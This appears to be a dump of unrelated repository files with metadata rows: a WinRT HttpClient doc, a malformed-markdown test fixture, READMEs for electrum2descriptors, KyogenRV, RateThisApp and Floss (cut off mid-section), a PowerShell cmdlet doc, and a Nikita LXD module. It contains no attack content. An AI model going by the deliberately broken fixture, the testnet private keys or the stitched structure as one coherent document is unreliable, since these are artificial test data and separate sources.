c3d1c5e6000fa7b06ed691e0bb48386f54c488c5
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
-api-id: M:Windows.Web.Http.HttpClient.TryGetInputStreamAsync(Windows.Foundation.Uri)
-api-type: winrt method
ms.custom: 19H1
---

<!-- Method syntax.
public IAsyncOperationWithProgress<HttpGetInputStreamResult, HttpProgress> HttpClient.TryGetInputStreamAsync(Uri uri)
-->

# Windows.Web.Http.HttpClient.TryGetInputStreamAsync

## -description

Send a GET request to the specified [Uri](../windows.foundation/uri.md) and return the response body as a stream in an asynchronous operation.

For programming guidance for the [HttpClient class](/uwp/api/windows.web.http.httpclient), and code examples, see the [HttpClient](/windows/uwp/networking/httpclient) conceptual topic.

## -parameters

### -param uri

The Uri the request is sent to.

## -returns

The object representing the asynchronous operation.

## -remarks

This operation will not block. The returned [IAsyncOperationWithProgress(HttpGetInputStreamResult, HttpProgress)](../windows.foundation/iasyncoperationwithprogress_2.md) object will complete after the whole response body is read.

This method does not buffer the stream, so it can support long streams of arbitrary length.

## -see-also

[HttpGetInputStreamResult](httpgetinputstreamresult.md), [HttpProgress](httpprogress.md), [IInputStream](../windows.storage.streams/iinputstream.md), [HttpClient](/windows/uwp/networking/httpclient)

## -examples
44.516129
331
0.776812
eng_Latn
0.769461
6f67160afdf79478169b92b0568d18df54541e39
557
md
Markdown
test/test_files/markdown_bad_1.md
tpansino/markdown-table-formatter
9089928ce5ac451da44a8f39d5c6508ac58d94ea
[ "MIT" ]
4
2021-01-14T11:08:00.000Z
2021-11-23T23:17:35.000Z
test/test_files/markdown_bad_1.md
tpansino/markdown-table-formatter
9089928ce5ac451da44a8f39d5c6508ac58d94ea
[ "MIT" ]
12
2021-01-13T16:34:14.000Z
2022-01-31T00:02:32.000Z
test/test_files/markdown_bad_1.md
tpansino/markdown-table-formatter
9089928ce5ac451da44a8f39d5c6508ac58d94ea
[ "MIT" ]
1
2021-04-05T04:54:05.000Z
2021-04-05T04:54:05.000Z
## Bad Markdown

This is just standard good markdown.

###### Second level header

This header does **NOT** follow the __step__ down from `level 1`.

- Here it *is*
- Some more indention
- why so much?

```
ls -la
```

| this | is a wrong | table |
| ---------------| -----------| -----------|
| hahaha | naaaaaaah | wrong formatting ! |
| hahaha | naaaaaaah | wrong formatting ! |

# Walk away

We're all done **here**.

- [Link Action]https://github.com
- [Link Action 2](#wesh)
- [Link Action 3](http://www.glouglouglglsdgdfgfdgsfgdfgdf.com)
20.62963
65
0.597846
eng_Latn
0.790116
6f6739d98230986f9085d9b6803b95ab4cf910fc
2,045
md
Markdown
README.md
weareseba/electrum2descriptors
b7501963d5fb83669bf91b5332f832a9234d865e
[ "MIT" ]
null
null
null
README.md
weareseba/electrum2descriptors
b7501963d5fb83669bf91b5332f832a9234d865e
[ "MIT" ]
null
null
null
README.md
weareseba/electrum2descriptors
b7501963d5fb83669bf91b5332f832a9234d865e
[ "MIT" ]
null
null
null
# electrum2descriptors

[![crates.io](https://img.shields.io/crates/v/electrum2descriptors.svg)](https://crates.io/crates/electrum2descriptors)

Converts [slip-0132](https://github.com/satoshilabs/slips/blob/master/slip-0132.md) extended keys (like the vpub, ypub, yprv, etc. used by Electrum) into [output descriptors](https://github.com/bitcoin/bitcoin/blob/master/doc/descriptors.md).

This project consists of a library and an executable.

The work of @ulrichard in this project was sponsored by [SEBA Bank AG](https://seba.swiss).

## Usage library

For the library interface, read [the docs](https://docs.rs/electrum2descriptors/latest/libelectrum2descriptors/). With the library, you can also convert from descriptor to slip-0132 and to electrum wallet files.

## Usage binary

```
$ cargo install electrum2descriptors
$ electrum2descriptors vpub5VXaSncXqxLbdmvrC4Y8z9CszPwuEscADoetWhfrxDFzPUbL5nbVtanYDkrVEutkv9n5A5aCcvRC9swbjDKgHjCZ2tAeae8VsBuPbS8KpXv
["wpkh(tpubD9ZjaMn3rbP1cAVwJy6UcEjFfTLT7W6DbfHdS3Wn48meExtVfKmiH9meWCrSmE9qXLYbGcHC5LxLcdfLZTzwme23qAJoRzRhzbd68dHeyjp/0/*)", "wpkh(tpubD9ZjaMn3rbP1cAVwJy6UcEjFfTLT7W6DbfHdS3Wn48meExtVfKmiH9meWCrSmE9qXLYbGcHC5LxLcdfLZTzwme23qAJoRzRhzbd68dHeyjp/1/*)"]
```

or

```
git clone https://github.com/RCasatta/electrum2descriptors
cd electrum2descriptors
cargo run -- vpub5VXaSncXqxLbdmvrC4Y8z9CszPwuEscADoetWhfrxDFzPUbL5nbVtanYDkrVEutkv9n5A5aCcvRC9swbjDKgHjCZ2tAeae8VsBuPbS8KpXv
["wpkh(tpubD9ZjaMn3rbP1cAVwJy6UcEjFfTLT7W6DbfHdS3Wn48meExtVfKmiH9meWCrSmE9qXLYbGcHC5LxLcdfLZTzwme23qAJoRzRhzbd68dHeyjp/0/*)", "wpkh(tpubD9ZjaMn3rbP1cAVwJy6UcEjFfTLT7W6DbfHdS3Wn48meExtVfKmiH9meWCrSmE9qXLYbGcHC5LxLcdfLZTzwme23qAJoRzRhzbd68dHeyjp/1/*)"]
```

It can also convert electrum wallet files to descriptors:

```
$ cargo run -- tests/wallets/default_segwit
["wpkh(tprv8cvkZzx9zA7EfFDbH945mK23r7hg6EHXUk79wVUSRukwyctFS1AdpSpkZcykAMDveCj8RA3R4jwFTKMwMbWexJox8NMqq7YphJLDumfCSfu/0/*)",
"wpkh(tprv8cvkZzx9zA7EfFDbH945mK23r7hg6EHXUk79wVUSRukwyctFS1AdpSpkZcykAMDveCj8RA3R4jwFTKMwMbWexJox8NMqq7YphJLDumfCSfu/1/*)"]
```
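The heart of the conversion above is that a SLIP-0132 prefix implies a descriptor wrapper. The sketch below illustrates only that mapping for the single-sig mainnet/testnet prefixes; it deliberately omits the base58check re-serialization of version bytes (e.g. vpub to tpub) that the real tool performs, so the already-converted key is passed in as a second argument. The function names are my own, not the crate's API.

```javascript
// Hypothetical illustration: SLIP-0132 prefix -> output descriptor wrapper.
const SLIP132_DESCRIPTOR = {
  xpub: (k) => `pkh(${k})`,       // legacy P2PKH
  ypub: (k) => `sh(wpkh(${k}))`,  // P2WPKH nested in P2SH
  zpub: (k) => `wpkh(${k})`,      // native segwit P2WPKH
  tpub: (k) => `pkh(${k})`,       // testnet equivalents of the above
  upub: (k) => `sh(wpkh(${k}))`,
  vpub: (k) => `wpkh(${k})`,
};

function toDescriptors(slipKey, convertedKey) {
  const wrap = SLIP132_DESCRIPTOR[slipKey.slice(0, 4)];
  if (!wrap) throw new Error(`unknown SLIP-0132 prefix: ${slipKey.slice(0, 4)}`);
  // One descriptor for the external (receive) chain and one for the
  // internal (change) chain, matching the two-element output in the README.
  return [wrap(`${convertedKey}/0/*`), wrap(`${convertedKey}/1/*`)];
}
```

So a `vpub...` input yields `wpkh(tpub.../0/*)` and `wpkh(tpub.../1/*)`, as shown in the README output above.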
53.815789
250
0.852323
yue_Hant
0.408884
6f67713feb465230c51e476040db4b2860b650c6
4,462
md
Markdown
gallery/psget/module/psget_get-installedmodule.md
I-Cat/PowerShell-Docs.ja-jp
d62d477477f3e66269cbc8c7225499629d4eff02
[ "CC-BY-4.0", "MIT" ]
2
2016-03-08T06:52:43.000Z
2019-01-16T06:04:51.000Z
gallery/psget/module/psget_get-installedmodule.md
I-Cat/PowerShell-Docs.ja-jp
d62d477477f3e66269cbc8c7225499629d4eff02
[ "CC-BY-4.0", "MIT" ]
null
null
null
gallery/psget/module/psget_get-installedmodule.md
I-Cat/PowerShell-Docs.ja-jp
d62d477477f3e66269cbc8c7225499629d4eff02
[ "CC-BY-4.0", "MIT" ]
1
2021-04-05T00:12:43.000Z
2021-04-05T00:12:43.000Z
# Get-InstalledModule

Gets the modules installed on a computer.

## Description

The Get-InstalledModule cmdlet gets the PowerShell modules that were installed on a computer with the Install-Module cmdlet.

For each installed module, Get-InstalledModule returns a PSRepositoryItemInfo object, which can optionally be piped to Uninstall-Module to uninstall that installed module.

- Get-InstalledModule can filter installed modules by the Name parameter.
- Get-InstalledModule can filter by the version parameters: MinimumVersion, MaximumVersion, RequiredVersion, and AllVersions.
- These parameters are mutually exclusive, except for MinimumVersion and MaximumVersion.
- These version parameters are allowed only with a single module name that contains no wildcards.
- When the RequiredVersion parameter is not specified, Get-InstalledModule returns the latest installed version of the module that is greater than or equal to the specified minimum version, or simply the latest installed version when no minimum version is specified.
- When the RequiredVersion parameter is specified, Get-InstalledModule returns only the installed module version that exactly matches the specified version.

## Cmdlet syntax

```powershell
Get-Command -Name Get-InstalledModule -Module PowerShellGet -Syntax
```

## Cmdlet online help reference

[Get-InstalledModule](http://go.microsoft.com/fwlink/?LinkId=526863)

## Example commands

```powershell
# Get all modules installed using PowerShellGet cmdlets
Get-InstalledModule

# Get a specific installed module
Get-InstalledModule DJoin

Version Name  Repository Description
------- ----  ---------- -----------
1.0     DJoin PSGallery  This is a PowerShell frontend to the DJOIN.exe c...

# Get installed module with wildcards
Get-InstalledModule -Name AzureRM*

# Get all versions of an installed module
Get-InstalledModule -Name AzureRM.Automation -AllVersions

# Get installed module with MinimumVersion
Get-InstalledModule -Name AzureRM.Automation -MinimumVersion 1.0.0

# Get installed module with MaximumVersion
Get-InstalledModule -Name AzureRM.Automation -MaximumVersion 1.0.8

# Get installed module with version range
Get-InstalledModule -Name AzureRM.Automation -MinimumVersion 1.0.0 -MaximumVersion 1.0.8

# Get installed module with RequiredVersion
Get-InstalledModule -Name AzureRM.Automation -RequiredVersion 1.0.3

# Properties of Get-InstalledModule returned object
Get-InstalledModule DJoin | Format-List * -Force

Name                       : DJoin
Version                    : 1.0
Type                       : Module
Description                : This is a PowerShell frontend to the DJOIN.exe command which provides better discoverability and usability.
Author                     : Jeffrey Snover
CompanyName                : jsnover
Copyright                  : (C) Microsoft Corporation. All rights reserved.
PublishedDate              : 2/15/2016 7:12:37 PM
InstalledDate              : 4/5/2016 4:13:39 PM
UpdatedDate                :
LicenseUri                 :
ProjectUri                 :
IconUri                    :
Tags                       : {Nano, PSModule}
Includes                   : {Function, RoleCapability, Command, DscResource...}
PowerShellGetFormatVersion :
ReleaseNotes               :
Dependencies               : {}
RepositorySourceLocation   : https://www.powershellgallery.com/api/v2/
Repository                 : PSGallery
PackageManagementProvider  : NuGet
AdditionalMetadata         : {description, installeddate, tags, PackageManagementProvider...}
InstalledLocation          : C:\Program Files\WindowsPowerShell\Modules\DJoin\1.0
```

## InstalledDate and UpdatedDate properties on the PSGetRepositoryItemInfo object

```
During the install operation:
    InstalledDate: current DateTime (Get-Date) value
    UpdatedDate: null

During the Update operation:
    InstalledDate: InstalledDate from the previous installation, otherwise current DateTime (Get-Date) value
    UpdatedDate: current DateTime (Get-Date) value
```

```powershell
Install-Module -Name ContosoServer -RequiredVersion 1.0 -Repository INT

Get-InstalledModule -Name ContosoServer | Format-Table Name, InstalledDate, UpdatedDate

Name          InstalledDate         UpdatedDate
----          -------------         -----------
ContosoServer 2/29/2016 11:59:14 AM

Update-Module -Name ContosoServer

Get-InstalledModule -Name ContosoServer | Format-Table Name, InstalledDate, UpdatedDate

Name          InstalledDate         UpdatedDate
----          -------------         -----------
ContosoServer 2/29/2016 11:59:14 AM 2/29/2016 12:00:15 PM
```

<!--HONumber=Oct16_HO1-->
36.876033
151
0.692963
yue_Hant
0.579129
6f677ce6dd5c203c4a95d980ba1798336bca1fc0
1,204
md
Markdown
packages/lxd/src/file/exists.coffee.md
DanielJohnHarty/node-nikita
0d83b5b6f568912026044a2c6f5fd66e0afb91ba
[ "MIT" ]
1
2020-05-04T08:50:45.000Z
2020-05-04T08:50:45.000Z
packages/lxd/src/file/exists.coffee.md
DanielJohnHarty/node-nikita
0d83b5b6f568912026044a2c6f5fd66e0afb91ba
[ "MIT" ]
null
null
null
packages/lxd/src/file/exists.coffee.md
DanielJohnHarty/node-nikita
0d83b5b6f568912026044a2c6f5fd66e0afb91ba
[ "MIT" ]
null
null
null
# `nikita.lxd.file.exists`

Check whether a file exists inside a container.

## Options

* `container` (string, required)
  The name of the container.
* `target` (string, required)
  File destination in the form of "<path>".

## Example

```js
require('nikita')
.lxd.file.exists({
  container: "my_container"
}, function(err, {status}) {
  console.info( err ? err.message : 'The file exists')
});
```

## Todo

* Push recursive directories
* Handle unmatched target permissions
* Handle unmatched target ownerships
* Detect name from lxd_target

## Source Code

    module.exports =
      shy: true,
      handler: ({options}) ->
        @log message: "Entering lxd.file.exists", level: 'DEBUG', module: '@nikitajs/lxd/lib/file/exists'
        # Validation
        throw Error "Invalid Option: container is required" unless options.container
        validate_container_name options.container
        throw Error "Invalid Option: target is required" unless options.target
        @system.execute
          cmd: """
          lxc exec #{options.container} -- stat #{options.target}
          """
          code_skipped: 1

## Dependencies

    validate_container_name = require '../misc/validate_container_name'
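The `code_skipped: 1` option in the handler above is what turns `stat`'s non-zero exit into "the file is absent" rather than an error. A framework-free sketch of that interpretation (the helper is hypothetical, not Nikita's API):

```javascript
// Hypothetical helper: map a command's exit code to a tri-state result,
// the way lxd.file.exists treats `stat` exiting 1 as "absent, not an error".
function interpretExitCode(code, { codeTrue = 0, codeSkipped = 1 } = {}) {
  if (code === codeTrue) return { status: true };     // target exists
  if (code === codeSkipped) return { status: false }; // target absent, skipped
  throw new Error(`command failed with exit code ${code}`);
}
```

Any other exit code (permission denied, container missing, etc.) still surfaces as a real error.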
24.08
103
0.685216
eng_Latn
0.737097
6f67bd57a01e8e58bcf060e1c86a209f16a2998a
143
md
Markdown
README.md
BombasticTom/CustomizableLuaSettings
b828a9fab5fae96dfe41da00195f91dce4be3a5b
[ "Apache-2.0" ]
2
2022-03-13T09:54:10.000Z
2022-03-13T10:07:04.000Z
README.md
BombasticTom/CustomizableLuaSettings
b828a9fab5fae96dfe41da00195f91dce4be3a5b
[ "Apache-2.0" ]
null
null
null
README.md
BombasticTom/CustomizableLuaSettings
b828a9fab5fae96dfe41da00195f91dce4be3a5b
[ "Apache-2.0" ]
null
null
null
# CustomizableLuaSettings

Wanna know what's this? Basically a cool mod I'm working on :cool:

Download here: https://gamebanana.com/mods/358754
47.666667
116
0.79021
eng_Latn
0.885797
6f688a1e13d7f4341b1e9652c59bd3a9c638caf1
6,690
md
Markdown
README.md
panda5mt/KyogenRV
80d7088200d0c8df03c37a7ee308e1142e6f85c4
[ "Apache-2.0" ]
39
2020-04-28T03:31:21.000Z
2022-03-21T12:13:28.000Z
README.md
panda5mt/KyogenRV
80d7088200d0c8df03c37a7ee308e1142e6f85c4
[ "Apache-2.0" ]
3
2020-05-11T07:22:21.000Z
2020-08-04T04:36:50.000Z
README.md
panda5mt/KyogenRV
80d7088200d0c8df03c37a7ee308e1142e6f85c4
[ "Apache-2.0" ]
4
2020-04-17T07:06:57.000Z
2022-03-21T12:13:29.000Z
KyogenRV(響玄RV): The Simple RISC-V for intel FPGA
=

## Japanese README is [here](README_J.md)

- Arch: RV32I
- Privilege: only M-mode
- User-Level ISA Version 2.2
- Privileged ISA Version 1.11
- Interrupt: External
- CPU Bus: Intel Avalon-MM Interface
- Pipelines: 5-stage (IF/ID/EX/MEM/WB)
- Written in Chisel-lang v.3.4 + Makefile

## I. Usage

#### 0. Using with intel FPGA

The standard environment assumption is using Cyclone10LP (10CL025YU256C8G).

##### Recommended development environment

- Cross development environment: an environment that satisfies all of the following conditions
  - An environment running Windows 10/WSL2
  - Running Quartus Prime Lite v.20.1.1 or higher
  - A scala/sbt environment must be available.
  - Python 3.7 or higher is required.
- FPGA requirements: devices that satisfy one of the following requirements
  - Cyclone 10LP (device with 10CL010 or more logic elements)
  - An intel FPGA with at least a 1-block PLL, at least 7000 LEs of logic elements, and at least 1 KiB of On-Chip RAM

##### Preparing the riscv-toolchain

```
git clone https://github.com/riscv/riscv-gnu-toolchain
cd riscv-gnu-toolchain
./configure --prefix=/opt/riscv --with-arch=rv32i
sudo make
```

##### Install KyogenRV and rebuild the FPGA logic

```
cd -
git clone http://github.com/panda5mt/KyogenRV
cd KyogenRV/
make sdk
```

##### Starting Quartus Prime

You can choose between GUI and CUI; the CUI method is useful when using a cloud or on-premises Windows PC.

###### Compiling with GUI

Run Quartus Prime and open the <code>[fpga/kyogenrv_fpga_top.qpf](fpga/kyogenrv_fpga_top.qpf)</code> project. Go to Menu -> Processing -> Start Compilation to start compilation.

###### Compiling with CUI

Open the build script <code>[build_sdk.sh](build_sdk.sh)</code> with an editor and set the Quartus Prime installation folder, KyogenRV directory, etc. After confirming that every PATH is correct, just run the following at the root of the project.

```
./build_sdk.sh
```

Regardless of which method (CUI or GUI) you use above, make sure that there are no build errors before modifying the project to fit your board environment using Pin Planner or Platform Designer.

The following file will be generated in the <code>[fpga](fpga)</code> folder.

- kyogenrv_fpga_top.sof

If you use CUI, the following file will also be generated.

- kyogenrv_fpga_top.svf

##### Modify the sample code (e.g., led.c)

Modifying <code>[src/sw/main.c](src/sw/main.c)</code> may help you understand how this RISC-V CPU and its project work. If the code consists of multiple files or the file names are changed, please rewrite <code>[src/sw/common2.mk](src/sw/common2.mk)</code> so that the Makefile builds all added and modified files.

##### Rebuild the project

###### Rebuild with GUI

After saving the file, run

```
make c_all
./mk_intel_hex.py
```

to compile the project and re-generate the intel hex files. If you want to build the whole FPGA project, you can run:

```
make sdk
```

Start compiling by going to Menu -> Processing -> Start Compilation. The generated *.sof file is used to configure the FPGA via Quartus Programmer.

###### Rebuild with CUI

Compared with the GUI, the procedure is simple. Just run the following to rebuild.

```
./build_sdk.sh
```

Configure the FPGA using *.sof or *.svf.

## The following is the procedure for PC-based simulation; it is not necessary when using the FPGA hardware.

##

#### 1. Simulation

```
git clone http://github.com/panda5mt/KyogenRV
cd KyogenRV/
make clean
make test
```

To generate your *.hex files from your *.s, put your *.s file in <code>[src/sw/](src/sw)</code> and then execute the following:

```
./build_asm.py   # generate *.hex file from *.s
./mk_intel_hex.py # generate intel hex files
```

#### 2. Simulating with riscv-tests (needs python 3.7 or later)

```
git clone http://github.com/panda5mt/KyogenRV
```

Clone riscv-tests:

```
git clone https://github.com/riscv/riscv-tests
cd riscv-tests
git submodule update --init --recursive
```

then modify the linker script

```
nano env/p/link.ld
```

and change the start address of the '.text' section to 0x00000000:

```
SECTIONS
{
  . = 0x00000000; # -> change this
  .text.init : { *(.text.init) }
  . = ALIGN(0x1000);
  .tohost : { *(.tohost) }
  . = ALIGN(0x1000);
  .text : { *(.text) }
  . = ALIGN(0x1000);
  .data : { *(.data) }
  .bss : { *(.bss) }
  _end = .;
}
```

Save link.ld and make riscv-tests:

```
autoconf
./configure --prefix=<your-kyogenRVs-root-dir>/tests/
make
make install
cd ../
```

```
cd KyogenRV/
make clean
make riscv-tests
```

#### 3. Generate Verilog

```
git clone http://github.com/panda5mt/KyogenRV
cd KyogenRV/
make clean
make hdl
```

##

## II. Basic Logic

##### The following instructions are written for those who want to explore this "KyogenRV" RV32I design step by step. Otherwise, please clone the latest from GitHub.

#### 1. Instruction Fetch Stage (IF)

```
git clone http://github.com/panda5mt/KyogenRV -b 0.0.2 --depth 1
cd KyogenRV/
make test
```

#### 2. Instruction Decode Stage (ID) and Integer ALU

```
git clone http://github.com/panda5mt/KyogenRV -b 0.0.9 --depth 1
cd KyogenRV/
make test
```

#### 3. Branch (PC update)

```
git clone http://github.com/panda5mt/KyogenRV -b 0.0.10.3 --depth 1
cd KyogenRV/
```

Write an asm file, save it to <code>[src/sw/test.s](src/sw/test.s)</code>, then build as follows:

```
make asm
```

You'll get <code>[src/sw/test.hex](src/sw/test.hex)</code>. Then build the test module in the chisel project as follows:

```
make test
```

#### 4. Multi-staged pipeline (5-staged pipeline)

```
git clone http://github.com/panda5mt/KyogenRV -b 0.0.10.10 --depth 1
cd KyogenRV/
```

Write an asm file, save it to <code>[src/sw/test.s](src/sw/test.s)</code>, then build as follows:

```
make clean
make asm
```

You'll get <code>[src/sw/test.hex](src/sw/test.hex)</code>. Then build the test module in the chisel project as follows:

```
make test
```

When you modify <code>[src/sw/test.s](src/sw/test.s)</code>, just type the following:

```
make test
```

The Makefile detects that test.hex has changed, re-assembles it, and then builds the chisel project.

#### 5. Added Stage-Stall and Stage-Forwardings

```
git clone http://github.com/panda5mt/KyogenRV -b 0.0.10.15 --depth 1
cd KyogenRV/
```

Write an asm file, save it to <code>[src/sw/test.s](src/sw/test.s)</code>, then build as follows:

```
make clean
make asm
```

You'll get <code>[src/sw/test.hex](src/sw/test.hex)</code>. Then build the test module in the chisel project as follows:

```
make test
```

When you modify <code>[src/sw/test.s](src/sw/test.s)</code>, just type the following:

```
make test
```

The Makefile detects that test.hex has changed, re-assembles it, and then builds the chisel project.

#### 6. Added Exception and External Interrupt

Please git clone the latest one.
28.347458
192
0.713004
eng_Latn
0.946402
6f6892f8180cb35cb04ae75f14c8aa7a42f35278
4,343
md
Markdown
README.md
Narmo/Android-RateThisApp
530b8260b2bcfcbfd76b406460915732b41e5f7f
[ "Apache-2.0" ]
1
2021-04-25T08:45:18.000Z
2021-04-25T08:45:18.000Z
README.md
Narmo/Android-RateThisApp
530b8260b2bcfcbfd76b406460915732b41e5f7f
[ "Apache-2.0" ]
null
null
null
README.md
Narmo/Android-RateThisApp
530b8260b2bcfcbfd76b406460915732b41e5f7f
[ "Apache-2.0" ]
null
null
null
Android-RateThisApp
===================

[![Build Status](https://circleci.com/gh/kobakei/Android-RateThisApp.svg?style=shield)](https://circleci.com/gh/kobakei/Android-RateThisApp/tree/master)
[ ![Download](https://api.bintray.com/packages/kobakei/maven/ratethisapp/images/download.svg) ](https://bintray.com/kobakei/maven/ratethisapp/_latestVersion)
[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-Android--RateThisApp-green.svg?style=true)](https://android-arsenal.com/details/1/2893)

Android-RateThisApp is a library to show a "Rate this app" dialog.

![Screen shot](https://raw.github.com/kobakei/Android-RateThisApp/master/screenshot_resized.png)

The library monitors the following status:

* how many times the app has been launched
* how many days have passed since the app was installed

and shows a dialog to engage users to rate the app in Google Play.

## Getting Started

### Dependency

```groovy
dependencies {
    compile 'io.github.kobakei:ratethisapp:x.y.z'
}
```

x.y.z is [ ![Download](https://api.bintray.com/packages/kobakei/maven/ratethisapp/images/download.svg) ](https://bintray.com/kobakei/maven/ratethisapp/_latestVersion)

**NOTICE**: From 1.0.0, the group ID has been changed from `com.kobakei` to `io.github.kobakei`.

### Basic usage

Call `RateThisApp.onStart(Context)` and `RateThisApp.showRateDialogIfNeeded(Context)` in your launcher activity's onStart() method.

```java
@Override
protected void onStart() {
    super.onStart();
    // Monitor launch times and interval from installation
    RateThisApp.onStart(this);
    // If the criteria is satisfied, "Rate this app" dialog will be shown
    RateThisApp.showRateDialogIfNeeded(this);
}
```

### Custom criteria

The default criteria to show the dialog are as below:

* App is launched more than 10 times
* App is launched more than 7 days after installation

If you want to use your own criteria, please call `RateThisApp.init(Configuration)` in your Application or launcher activity onCreate method.

```java
// Custom criteria: 3 days and 5 launches
RateThisApp.Config config = new RateThisApp.Config(3, 5);
RateThisApp.init(config);
```

### Custom strings

You can override the title, message and button labels.

```java
RateThisApp.Config config = new RateThisApp.Config();
config.setTitle(R.string.my_own_title);
config.setMessage(R.string.my_own_message);
config.setYesButtonText(R.string.my_own_rate);
config.setNoButtonText(R.string.my_own_thanks);
config.setCancelButtonText(R.string.my_own_cancel);
RateThisApp.init(config);
```

### Custom url

By default, the rate button navigates to the application page on Google Play. You can override this url as below.

```java
RateThisApp.Config config = new RateThisApp.Config();
config.setUrl("http://www.example.com");
RateThisApp.init(config);
```

### Opt out from your code

If you want to stop showing the rate dialog, use this method in your code.

```java
RateThisApp.stopRateDialog(this);
```

### Callback

You can receive yes/no/cancel button click events.

```java
RateThisApp.setCallback(new RateThisApp.Callback() {
    @Override
    public void onYesClicked() {
        Toast.makeText(MainActivity.this, "Yes event", Toast.LENGTH_SHORT).show();
    }

    @Override
    public void onNoClicked() {
        Toast.makeText(MainActivity.this, "No event", Toast.LENGTH_SHORT).show();
    }

    @Override
    public void onCancelClicked() {
        Toast.makeText(MainActivity.this, "Cancel event", Toast.LENGTH_SHORT).show();
    }
});
```

## Contribute to this project

If you want to contribute to this project, please send a pull request. At present, I need contributors who can translate resources from English/Japanese into other languages.

## License

```
Copyright 2013-2016 Keisuke Kobayashi

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

   http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
```

## Author

Keisuke Kobayashi - k.kobayashi.122@gmail.com
29.951724
166
0.750863
eng_Latn
0.68477
6f689ed11887e2ead94da39a58ee8ed3bafeb3c4
744
md
Markdown
CHANGELOG.md
spypunk/snake
17b0fab67ac9f2ad29cba34df6a6a67639ef1596
[ "WTFPL" ]
8
2016-09-29T06:10:06.000Z
2022-01-24T21:33:23.000Z
CHANGELOG.md
coolpup/snake
17b0fab67ac9f2ad29cba34df6a6a67639ef1596
[ "WTFPL" ]
null
null
null
CHANGELOG.md
coolpup/snake
17b0fab67ac9f2ad29cba34df6a6a67639ef1596
[ "WTFPL" ]
6
2017-07-12T18:00:17.000Z
2022-01-24T21:33:24.000Z
# Change Log

All notable changes to this project will be documented in this file.

The format is based on [Keep a Changelog](http://keepachangelog.com/) and this project adheres to [Semantic Versioning](http://semver.org/).

## [1.7.0] - 2017-08-11
- Rendering optimizations and refactoring

## [1.6.0] - 2017-08-09
- Optimizations and refactoring

## [1.5.0] - 2017-08-07
- Optimizations and refactoring

## [1.4.0] - 2017-08-01
- Optimizations and refactoring
- Code of conduct added

## [1.3.0] - 2017-07-31
- Optimizations and a lot of refactoring

## [1.2.0] - 2016-09-28
- Statistics added

## [1.1.0] - 2016-09-26
- Bonus food added

## [1.0.0] - 2016-09-18
- First stable release

## [0.1.0] - 2016-09-14
- First beta release
17.302326
140
0.674731
eng_Latn
0.919297
6f691fc7336b41787a5a05448be868e3256fd675
4,808
md
Markdown
README.md
pixijs/floss
81d21cb7ddb380839ac2c4ca554842b1b125143f
[ "MIT" ]
20
2017-07-07T20:05:49.000Z
2022-01-14T20:17:55.000Z
README.md
pixijs/floss
81d21cb7ddb380839ac2c4ca554842b1b125143f
[ "MIT" ]
22
2017-06-12T15:27:54.000Z
2022-03-25T18:25:55.000Z
README.md
pixijs/floss
81d21cb7ddb380839ac2c4ca554842b1b125143f
[ "MIT" ]
4
2018-04-30T16:27:18.000Z
2021-12-11T21:22:11.000Z
# Floss

Unit-testing for those hard to reach places.

[![Node.js CI](https://github.com/pixijs/floss/workflows/Node.js%20CI/badge.svg)](https://github.com/pixijs/floss/actions?query=workflow%3A%22Node.js+CI%22) [![npm version](https://badge.fury.io/js/floss.svg)](https://badge.fury.io/js/floss)

Uses Electron to provide a Mocha unit-testing environment which can be run headlessly or debugged with DevTools. This was largely inspired by the [electron-mocha](https://github.com/jprichardson/electron-mocha) and [mocha-electron](https://github.com/tscanlin/mochatron) projects, which didn't quite have the debugging features needed to develop tests.

## Installation

Install globally:

```bash
npm install -g floss electron
```

Install locally within a project:

```bash
npm install floss electron --save-dev
```

### Debug Mode

Open tests in an Electron window where tests can be debugged with `debugger` and dev tools.

```js
await floss({
    path: 'test/*.js',
    debug: true
});
```

### Mocha Reporter

The `reporter` and `reporterOptions` are pass-through options for Mocha to specify a different reporter when running Floss in non-debug mode.

```js
await floss({
    path: 'test/*.js',
    reporter: 'xunit',
    reporterOptions: {
        filename: 'report.xml'
    }
});
```

### Custom Options

Additional properties can be passed to the test code by adding more values to the run options.

```js
await floss({
    path: 'test/*.js',
    customUrl: 'http://localhost:8080' // <- custom
});
```

The test code can use the global `options` property to access the run options.

```js
console.log(options.customUrl); // logs: http://localhost:8080
```

### Electron Arguments

Commandline arguments can be passed to Electron directly by using `args`. In the example below, you may want to disable Electron's user-gesture policy if you are testing HTML video or audio playback.

```js
await floss({
    path: 'test/index.js',
    args: ['--autoplay-policy=no-user-gesture-required']
});
```

## Command Line Usage

### Arguments

* **--path** or **-p** (String) Path to the file to test
* **--debug** or **-d** (Boolean) Enable to run in headful mode, default `false`.
* **--quiet** or **-q** (Boolean) Prevent console[log/info/error/warn/dir] messages from appearing in `stdout`.
* **--electron** or **-e** (String) Path to the electron to use.
* **--reporter** or **-R** (String) Mocha reporter type, default `spec`.
* **--reporterOptions** or **-O** (String) Mocha reporter options.
* **--require** or **-r** (String) Module to require (e.g., `ts-node/register`).
* **-- [args]** Additional arguments can be passed to Electron after `--`

### Usage

Command Line usage when installed globally:

```bash
floss --path "test/*.js"
```

Or installed locally:

```bash
node node_modules/.bin/floss --path "test/*.js"
```

Alternatively, within the **package.json**'s scripts:

```json
{
    "scripts": {
        "test": "floss --path \"test/*.js\""
    }
}
```

### Debug Mode

Open tests in an Electron window where tests can be debugged with `debugger` and dev tools.

```bash
floss --path "test/*.js" --debug
```

### Using TypeScript

Support can easily be added for writing tests in TypeScript using [ts-node](https://www.npmjs.com/package/ts-node).

```bash
floss --path "test/*.ts" --require ts-node/register
```

### Istanbul Code Coverage

Floss supports `nyc`. To use it, just use floss as you would mocha:

```bash
nyc floss --path "test/*.js"
```

### Mocha Reporter

You can use the same reporter options as in the API mentioned above. The `reporterOptions` are expressed as a querystring, for instance `varname=foo&another=bar`.

```bash
floss --path "test/*.js" \
    --reporter=xunit \
    --reporterOptions output=report.xml
```

### Electron Arguments

Supports passing additional arguments to Electron after `--`.

```bash
floss --path "test/*.js" -- --autoplay-policy=no-user-gesture-required
```

## Custom Electron Version

